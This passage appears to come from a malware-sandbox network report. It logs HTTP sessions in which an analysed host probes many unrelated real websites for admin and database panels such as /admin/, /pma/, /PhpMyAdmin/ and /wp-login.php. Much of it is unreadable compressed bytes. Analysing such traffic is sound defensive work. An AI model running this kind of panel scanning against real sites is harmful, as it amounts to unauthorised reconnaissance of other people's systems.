Content-Type: text/html
Data Ascii: <HTML>... Created by HTTrack Website Copier/3.47-27 [XR&CO'2013] -->... Mirrored from www.seniat.gob.ve/ by HTTrack Website Copier/3.x [XR&CO'2013], Thu, 16 Jan 2014 04:14:18 GMT -->... Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=iso-8859-1" />... /Added by HTTrack --><HEAD><TITLE>Page has moved</TITLE></HEA
Feb 5, 2024 12:16:08.568485975 CET | 288 | IN
Data Ascii: D><BODY><META HTTP-EQUIV="Refresh" CONTENT="0; URL=http://declaraciones.seniat.gob.ve"><A HREF="http://declaraciones.seniat.gob.ve"><B>Cargando Portal...</B></A></BODY>... Created by HTTrack Website Copier/3.47-27 [XR&CO'2013] -->
Feb 5, 2024 12:16:08.568506002 CET | 83 | IN
Data Ascii: Track Website Copier/3.x [XR&CO'2013], Thu, 16 Jan 2014 04:14:18 GMT --></HTML>


Session ID | Source IP | Source Port | Destination IP | Destination Port
468 | 192.168.2.6 | 64684 | 192.185.5.23 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:08.410916090 CET | 170 | OUT | GET /admin/ HTTP/1.1
Host: multiideas.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:08.588205099 CET | 1286 | IN | HTTP/1.1 200 OK
Date: Mon, 05 Feb 2024 11:16:08 GMT
Server: nginx/1.23.4
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip
X-Server-Cache: true
X-Proxy-Cache: MISS
Set-Cookie: PHPSESSID=ceb083c310c87d2a026e169cfe7ddc37; path=/
Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: Aeu,<z5ffJC!K'"Fs5UjRsr:ef33l1QS43coZ}i71i6N&^JEHW:&$M<'F8cE<%T^Zz\uO!j{AK \Mq7wSYx*
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.588408947 CET1286INData Raw: 31 66 66 38 0d 0a c5 98 a4 26 c3 86 09 8a a7 e2 f2 62 76 b7 18 d6 97 af 2e 66 87 c7 db eb 6d 8f 28 07 aa 5b cd 8b 6e b9 dd e8 65 bf 3d b4 85 3a 76 ed c3 d7 db f7 f3 a2 62 c3 a0 9c 2d 90 cc 6a b5 ec 17 87 c3 bc 60 6c 0a 85 ba 2b eb 64 32 7e e0 72
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 1ff8&bv.fm([ne=:vb-j`l+d2~r102Pr1rCxKp{sZ0<?CU*:S>N?4eMY:]_pjy?X%/NM20
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.588424921 CET1286INData Raw: b2 82 35 65 93 ec 4e 28 d6 32 eb 7c 82 3b 7d 52 37 bf 66 70 95 8b f9 e6 bc 73 3e 6d 46 2b 12 98 aa ce 1a 68 c9 e7 34 68 67 2d 16 a7 08 79 00 fd 71 6a 67 53 3c 0f 43 8b f3 cd 19 96 3a 29 8d 7c 25 af 67 19 f3 99 6f 90 ff 74 15 e5 c3 3a 8a bd 3b f5
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 5eN(2|;}R7fps>mF+h4hg-yqjgS<C:)|%got:;g1s*Q_&eMyK>]2S|V=S$_I|"G1-6hy4',@U?]5B&%#62NS:+@twkvYiuXI9bX_
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.588442087 CET1286INData Raw: 34 b7 32 89 c0 d7 a6 6c 8c 39 b2 43 dd ac 01 08 f4 1e f3 07 dc 53 87 a3 11 9b e2 a3 4e 11 69 f2 f5 74 65 8c d8 db a6 32 e0 29 a4 e6 a8 d3 09 0a bf 22 1c 46 33 04 47 51 e0 36 53 56 26 e5 10 cb d9 cc 44 76 64 3e f1 cc 33 f8 73 0c 59 8f 3a 62 c0 b9
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 42l9CSNite2)"F3GQ6SV&Dvd>3sY:bgxp>M1T212CM!lo,dL9jW9'cItc9 p$-aw36PJR/wc!{fpho!IW*$*zIF2-4v4?EM
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.690042019 CET1286INData Raw: c5 ec 6e 31 ac 2f 5f 5d cc 0e 8f b7 d7 db 1e 51 0e 54 b7 9a 17 dd 72 bb d1 ef fa 6e f9 fd be 50 c7 ae 7d f8 7a fb 7e 5e 54 b0 a5 ad 95 b3 05 b2 59 ae 96 fd e2 70 98 17 8c 4d a1 50 78 65 31 3d 45 25 e7 ce 96 c6 06 14 b9 32 3a ba 38 54 cd 20 67 be
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: n1/_]QTrnP}z~^TYpMPxe1=E%2:8T g94>V'O1'_O:y&Etelmin3R9SMnG7c).oIzKMzX)m/;.M]iX}.WuY,Mdj4z


Session ID | Source IP | Source Port | Destination IP | Destination Port
469 | 192.168.2.6 | 64570 | 54.71.181.160 | 80

Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:08.426209927 CET | 175 | OUT | GET /pma/ HTTP/1.1
Host: ucivirtual.uci.edu.mx
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:08.600258112 CET | 1286 | IN | HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/10.0
Date: Mon, 05 Feb 2024 11:15:23 GMT
Content-Length: 1245


Session ID | Source IP | Source Port | Destination IP | Destination Port
470 | 192.168.2.6 | 64214 | 124.237.208.37 | 80

Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:08.440968037 CET | 172 | OUT | GET /admin.php HTTP/1.1
Host: pan.baidu.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:08.815648079 CET | 1280 | IN | HTTP/1.1 200 OK
Connection: keep-alive
Content-Encoding: gzip
Content-Type: text/html
Date: Mon, 05 Feb 2024 11:16:08 GMT
Etag: W/"60fffc02-1d60"
Last-Modified: Tue, 27 Jul 2021 12:28:50 GMT
Logid: 8900820354659383301
P3p: CP=" OTI DSP COR IVA OUR IND COM "
Server: nginx
Set-Cookie: BAIDUID=CAFEC4A3F3092B6753C1F1957D1423D5:FG=1; expires=Tue, 04-Feb-25 11:16:08 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
Vary: Accept-Encoding
X-Powered-By: BaiduCloud
Yld: 8900820354659383301
Yme: ZIGW+iw9QE0WbCsGSw==
Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0
Feb 5, 2024 12:16:09.025866032 CET | 1280 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:08 GMT
                                                                                                                                                                                                                                                                                                                                                                Etag: W/"60fffc02-1d60"
                                                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 27 Jul 2021 12:28:50 GMT
                                                                                                                                                                                                                                                                                                                                                                Logid: 8900820354659383301
                                                                                                                                                                                                                                                                                                                                                                P3p: CP=" OTI DSP COR IVA OUR IND COM "
                                                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: BAIDUID=CAFEC4A3F3092B6753C1F1957D1423D5:FG=1; expires=Tue, 04-Feb-25 11:16:08 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: BaiduCloud
                                                                                                                                                                                                                                                                                                                                                                Yld: 8900820354659383301
                                                                                                                                                                                                                                                                                                                                                                Yme: ZIGW+iw9QE0WbCsGSw==
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
Feb 5, 2024 12:16:09.433955908 CET | 1280 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:08 GMT
                                                                                                                                                                                                                                                                                                                                                                Etag: W/"60fffc02-1d60"
                                                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 27 Jul 2021 12:28:50 GMT
                                                                                                                                                                                                                                                                                                                                                                Logid: 8900820354659383301
                                                                                                                                                                                                                                                                                                                                                                P3p: CP=" OTI DSP COR IVA OUR IND COM "
                                                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: BAIDUID=CAFEC4A3F3092B6753C1F1957D1423D5:FG=1; expires=Tue, 04-Feb-25 11:16:08 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: BaiduCloud
                                                                                                                                                                                                                                                                                                                                                                Yld: 8900820354659383301
                                                                                                                                                                                                                                                                                                                                                                Yme: ZIGW+iw9QE0WbCsGSw==
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
Feb 5, 2024 12:16:10.274878979 CET | 1280 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:08 GMT
                                                                                                                                                                                                                                                                                                                                                                Etag: W/"60fffc02-1d60"
                                                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 27 Jul 2021 12:28:50 GMT
                                                                                                                                                                                                                                                                                                                                                                Logid: 8900820354659383301
                                                                                                                                                                                                                                                                                                                                                                P3p: CP=" OTI DSP COR IVA OUR IND COM "
                                                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: BAIDUID=CAFEC4A3F3092B6753C1F1957D1423D5:FG=1; expires=Tue, 04-Feb-25 11:16:08 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: BaiduCloud
                                                                                                                                                                                                                                                                                                                                                                Yld: 8900820354659383301
                                                                                                                                                                                                                                                                                                                                                                Yme: ZIGW+iw9QE0WbCsGSw==
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked


Session ID | Source IP | Source Port | Destination IP | Destination Port
471 | 192.168.2.6 | 64566 | 64.190.63.136 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:08.478511095 CET | 225 | OUT | GET /admin.php?sub1=20240205-2216-0830-9373-ed2bb15864e8 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ww16.followerstiktok.xyz
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.688138008 CET88INHTTP/1.1 439
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:16:08 GMT
                                                                                                                                                                                                                                                                                                                                                                content-length: 0
                                                                                                                                                                                                                                                                                                                                                                server: NginX


Session ID  Source IP    Source Port  Destination IP  Destination Port
472         192.168.2.6  64731        64.190.63.111   80

Timestamp  Bytes transferred  Direction  Data
Feb 5, 2024 12:16:08.548686981 CET  163  OUT  GET /pma/ HTTP/1.1
Host: foros.net
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:08.758327007 CET  88  IN  HTTP/1.1 439
date: Mon, 05 Feb 2024 11:16:08 GMT
content-length: 0
server: NginX


Session ID  Source IP    Source Port  Destination IP  Destination Port
473         192.168.2.6  65127        54.71.181.160   80

Timestamp  Bytes transferred  Direction  Data
Feb 5, 2024 12:16:10.331856966 CET  176  OUT  GET /admin HTTP/1.1
Host: ucivirtual.uci.edu.mx
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:10.503741026 CET  365  IN  HTTP/1.1 301 Moved Permanently
Content-Type: text/html; charset=UTF-8
Location: http://ucivirtual.uci.edu.mx/admin/
Server: Microsoft-IIS/10.0
Date: Mon, 05 Feb 2024 11:15:25 GMT
Content-Length: 158
Data Ascii: <head><title>Document Moved</title></head><body><h1>Object Moved</h1>This document may be found <a HREF="http://ucivirtual.uci.edu.mx/admin/">here</a></body>
Feb 5, 2024 12:16:10.503876925 CET  177  OUT  GET /admin/ HTTP/1.1
Host: ucivirtual.uci.edu.mx
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:11.806559086 CET  960  IN  HTTP/1.1 303 See Other
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Language: es-mx
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: http://ucivirtual.uci.edu.mx/admin/index.php?cache=1
Server: Microsoft-IIS/10.0
X-Powered-By: PHP/7.2.7
X-Accel-Buffering: no
Set-Cookie: MoodleSession=0a9fols7vpjhrg7hr2aglohso1; path=/
Date: Mon, 05 Feb 2024 11:15:26 GMT
Content-Length: 499
Data Ascii: <!DOCTYPE html><html lang="es-mx" xml:lang="es-mx"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>Redireccionar</title></head><body><div style="margin-top: 3em; margin-left:auto; margin-right:auto; text-align:center;">Esta página debería redireccionar automáticamente. Si no ocurre nada, por favor utilice el enlace de continuar que aparece más abajo.<br /><a href="http://ucivirtual.uci.edu.mx/admin/index.php?cache=1">Continuar</a></div></body></html>
Feb 5, 2024 12:16:12.064337969 CET  244  OUT  GET /admin/index.php?cache=1 HTTP/1.1
Host: ucivirtual.uci.edu.mx
Accept: */*
Accept-Encoding: deflate, gzip
Cookie: MoodleSession=0a9fols7vpjhrg7hr2aglohso1
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:12.376604080 CET  882  IN  HTTP/1.1 303 See Other
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Language: es-mx
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: http://ucivirtual.uci.edu.mx/login/index.php
Server: Microsoft-IIS/10.0
X-Powered-By: PHP/7.2.7
X-Accel-Buffering: no
Date: Mon, 05 Feb 2024 11:15:26 GMT
Content-Length: 491
Data Ascii: <!DOCTYPE html><html lang="es-mx" xml:lang="es-mx"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>Redireccionar</title></head><body><div style="margin-top: 3em; margin-left:auto; margin-right:auto; text-align:center;">Esta página debería redireccionar automáticamente. Si no ocurre nada, por favor utilice el enlace de continuar que aparece más abajo.<br /><a href="http://ucivirtual.uci.edu.mx/login/index.php">Continuar</a></div></body></html>
Feb 5, 2024 12:16:12.377783060 CET | 236 | OUT | GET /login/index.php HTTP/1.1
Host: ucivirtual.uci.edu.mx
Accept: */*
Accept-Encoding: deflate, gzip
Cookie: MoodleSession=0a9fols7vpjhrg7hr2aglohso1
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:12.810662985 CET | 1286 | IN | HTTP/1.1 200 OK
Cache-Control: private, pre-check=0, post-check=0, max-age=0, no-transform
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Language: es-mx
Accept-Ranges: none
Server: Microsoft-IIS/10.0
X-Powered-By: PHP/7.2.7
Content-Script-Type: text/javascript
Content-Style-Type: text/css
X-UA-Compatible: IE=edge
X-Frame-Options: sameorigin
Date: Mon, 05 Feb 2024 11:15:27 GMT
Content-Length: 29840
Data Ascii: <!DOCTYPE html><html dir="ltr" lang="es-mx" xml:lang="es-mx"><head> <title>UCI Virtual: Ingresar al sitio</title> <link rel="shortcut icon" href="http://ucivirtual.uci.edu.mx/theme/image.php/boost/theme/1656634060/favicon" /> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="keywords" content="moodle, UCI Virtual: Ingresar al sitio" /><link rel="stylesheet" type="text/css" href="http://ucivirtual.uci.edu.mx/theme/yui_combo.php?rollup/3.17.2/yui-moodlesimple-min.css" /><script id="firstthemesheet" type="text/css">/** Required in order to fix style inclusion problems in IE with YUI **/</script><link rel="stylesheet" type="text/css" href="http://ucivirtual.uci.edu.mx/theme/styles.php/boost/1656634060_1/all" /><script type="text/javascript">//<![CDATA[var M = {}; M.yui = {};M.pageloadstartti


Session ID | Source IP | Source Port | Destination IP | Destination Port
474 | 192.168.2.6 | 65140 | 103.224.182.210 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:10.503443956 CET | 174 | OUT | GET /admin HTTP/1.1
Host: followerstiktok.xyz
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:10.665235996 CET | 342 | IN | HTTP/1.1 302 Found
date: Mon, 05 Feb 2024 11:16:10 GMT
server: Apache
set-cookie: __tad=1707131770.6688208; expires=Thu, 02-Feb-2034 11:16:10 GMT; Max-Age=315360000
location: http://ww16.followerstiktok.xyz/admin?sub1=20240205-2216-10dd-af1c-3865e2a64b77
content-length: 2
content-type: text/html; charset=UTF-8
connection: close
Data Raw: 0a 0a
Data Ascii:


Session ID: 475 | Source IP: 192.168.2.6 | Source Port: 65145 | Destination IP: 104.255.105.79 | Destination Port: 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:10.503495932 CET | 185 | OUT | GET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: signin.rockstargames.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:10.625916958 CET | 148 | IN | HTTP/1.0 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                Location: https://signin.rockstargames.com/PhpMyAdmin/
                                                                                                                                                                                                                                                                                                                                                                Server: BigIP
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0


Session ID: 476 | Source IP: 192.168.2.6 | Source Port: 65135 | Destination IP: 87.233.198.20 | Destination Port: 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:10.503544092 CET | 184 | OUT | GET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: idp.uitgeverij-deviant.nl
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:10.697038889 CET | 121 | IN | HTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                content-length: 0
                                                                                                                                                                                                                                                                                                                                                                location: https://idp.uitgeverij-deviant.nl/wp-admin/
                                                                                                                                                                                                                                                                                                                                                                cache-control: no-cache


Session ID: 477 | Source IP: 192.168.2.6 | Source Port: 65166 | Destination IP: 138.197.59.199 | Destination Port: 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:10.503668070 CET | 178 | OUT | GET /admin HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: api.cmrsanmartin.ziz.cl
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:10.625653982 CET | 552 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:10 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Location: https://api.cmrsanmartin.ziz.cl/admin
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 334
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://api.cmrsanmartin.ziz.cl/admin">here</a>.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at api.cmrsanmartin.ziz.cl Port 80</address></body></html>


Session ID: 478 | Source IP: 192.168.2.6 | Source Port: 65164 | Destination IP: 3.134.125.175 | Destination Port: 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:10.503703117 CET | 191 | OUT | GET /wp-login.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: 3fba-180-252-166-236.ngrok.io
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:10.627414942 CET | 330 | IN | HTTP/1.1 307 Temporary Redirect
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Location: https://3fba-180-252-166-236.ngrok.io/wp-login.php
                                                                                                                                                                                                                                                                                                                                                                Ngrok-Trace-Id: 9586c048e6ab93e7b5fd12f005048b42
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:10 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 86
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <a href="https://3fba-180-252-166-236.ngrok.io/wp-login.php">Temporary Redirect</a>.
Feb 5, 2024 12:16:12.180712938 CET | 249 | OUT | GET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: 3fba-180-252-166-236.ngrok.io
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Referer: https://3fba-180-252-166-236.ngrok.io/wp-login.php
Feb 5, 2024 12:16:12.304466963 CET | 324 | IN | HTTP/1.1 307 Temporary Redirect
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Location: https://3fba-180-252-166-236.ngrok.io/wp-admin/
                                                                                                                                                                                                                                                                                                                                                                Ngrok-Trace-Id: 09f9ba58dc22fac7f991cd382d7bd964
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:12 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 83
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <a href="https://3fba-180-252-166-236.ngrok.io/wp-admin/">Temporary Redirect</a>.


Session ID: 479 | Source IP: 192.168.2.6 | Source Port: 65172 | Destination IP: 142.250.105.84 | Destination Port: 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:10.504776001 CET | 181 | OUT | GET /wp-login.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: accounts.google.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:10.628552914 CET | 486 | IN | HTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:10 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://accounts.google.com/wp-login.php
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'self'
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 185
                                                                                                                                                                                                                                                                                                                                                                Server: GSE
Feb 5, 2024 12:16:10.628566027 CET | 185 | IN | Data Raw: 1f 8b 08 00 00 00 00 00 00 ff 6d 8f c1 0a 83 30 10 44 ef 7e 45 48 cf 4d da 6b 89 01 5b 63 2d 28 82 e4 d0 1e 45 83 11 8c 1b 34 b6 f4 ef 1b d3 1e 3b 97 65 67 87 e1 2d cb 65 59 f0 88 e5 22 49 fd 90 37 59 08 5e c2 53 75 48 2a 63 61 6e e6 61 7c 33 fa
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: m0D~EHMk[c-(E4;eg-eY"I7Y^SuH*cana|3=D*}RU]wCzIPjndB%(Ec]N6m"-a"V['ox6<
Feb 5, 2024 12:16:12.205627918 CET | 229 | OUT | GET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: accounts.google.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Referer: https://accounts.google.com/wp-login.php
Feb 5, 2024 12:16:12.324656010 CET | 483 | IN | HTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:12 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://accounts.google.com/wp-admin/
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'self'
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 183
                                                                                                                                                                                                                                                                                                                                                                Server: GSE
Feb 5, 2024 12:16:12.324673891 CET | 183 | IN | Data Raw: 1f 8b 08 00 00 00 00 00 00 ff 6d 8f c1 0a 83 30 10 44 ef 7e 45 48 cf 35 ed b5 c4 80 ad b1 16 14 41 f6 d0 1e 43 0c 46 30 46 34 b6 f4 ef 1b d3 1e 3b 97 65 67 87 e1 2d 2d a0 2a 59 44 0b 9e 66 7e c0 0d 4a ce 2a fb 54 2d 02 65 26 3b 8b b9 1f de 94 7c
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: m0D~EH5ACF0F4;eg--*YDf~J*T-e&;|%|e$xa~=hZ+WFX9ysr"DHi-qgm7XZC^^fZmhO


Session ID | Source IP | Source Port | Destination IP | Destination Port
480 | 192.168.2.6 | 65178 | 54.183.63.241 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:10.507181883 CET | 173 | OUT | GET /admin HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: pt.secure.imvu.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
